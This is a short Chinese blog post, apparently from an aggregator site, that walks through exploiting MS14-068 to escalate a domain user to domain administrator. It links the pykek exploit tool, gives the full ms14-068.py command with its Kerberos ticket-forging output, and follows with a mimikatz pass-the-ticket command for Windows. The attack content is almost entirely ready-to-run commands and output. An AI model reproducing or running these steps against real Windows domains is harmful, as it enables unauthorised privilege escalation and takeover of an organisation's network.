ms14-068漏洞获取域控管理员密码

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ms14-068漏洞获取域控管理员密码相关的知识,希望对你有一定的参考价值。

工具下载地址:https://github.com/bidord/pykek/ 

[email protected]:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password: 
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Creating ccache file '[email protected]'... Done!
[email protected]:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0

On Windows

python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc [email protected]" exit`


以上是关于ms14-068漏洞获取域控管理员密码的主要内容,如果未能解决你的问题,请参考以下文章

MS14-068域提权漏洞复现

微软公布带外安全更新MS14-068

MS14-068 Kerberos域用户提权漏洞

MS14-068 漏洞分析—不安全的PAC

升级为域控制器后如何更改域控管理员密码?

怎样更改域账号的密码